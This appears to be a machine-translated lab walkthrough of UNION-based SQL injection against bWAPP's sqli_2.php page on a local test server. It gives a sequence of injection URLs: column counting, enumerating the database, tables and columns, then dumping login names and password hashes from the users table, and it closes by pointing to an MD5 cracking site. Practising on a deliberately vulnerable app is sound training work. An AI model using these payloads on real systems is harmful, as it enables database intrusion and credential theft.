Choose a little bit , Observe URL, Only movie The value of is changing , and GET/Search Medium title It should be the same

Look at the type

http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 or 1=1 &action=go

1. Check the number of fields

http://192.168.3.95/bWAPP/sqli_2.php?movie=1 order by 7 &action=go

2. View displayable fields

http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,2,3,4,5,6,7 &action=go

2,3,4,5 Is a displayable field

 3. Blast storage

http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,database(),3,4,5,6,7 &action=go

Library name ：bWAPP

4. Explosion meter

http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database() &action=go

Found that only burst out 1 Tables

  use group_concat() Put the watches together

http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database() &action=go

This time there is 5 It's a table. , We need to use it. users

 5. Pop field

http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_schema=database() and table_name='users'&action=go

We need to use it. login and password

 6. Pop field content

http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,group_concat(login),group_concat(password),4,5,6,7 from bWAPP.users &action=go

2 individual

 7.MD5 Decrypt https://www.cmd5.com/